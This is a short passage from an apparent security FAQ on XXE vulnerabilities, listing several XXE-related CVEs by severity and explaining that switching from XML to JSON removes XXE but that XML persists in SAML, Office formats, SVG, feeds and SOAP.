By CVSS severity: CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0), CVE-2024-45409 (ruby-saml SAML bypass, CVSS 10.0), CVE-2024-34102 (Adobe Commerce CosmicSting, CVSS 9.8 — most exploited XXE of 2024, 170,000+ affected stores), CVE-2025-49493 (Akamai CloudTest SOAP, CVSS 9.1), CVE-2024-22024 (Ivanti Connect Secure SAML, CVSS 8.3), CVE-2025-13096 (IBM BAW, CVSS 8.2), CVE-2024-30043 (SharePoint, CVSS 6.5).

Does switching from XML to JSON eliminate XXE?

Yes — JSON parsers do not implement the DTD/entity system that enables XXE. If an application can migrate from XML to JSON for its API, XXE is eliminated at the architecture level. However, XML cannot be avoided in SAML assertions, Office document formats (DOCX/XLSX), SVG images, RSS/Atom feeds, SOAP services, and enterprise integration protocols. For those contexts, parser hardening is mandatory.
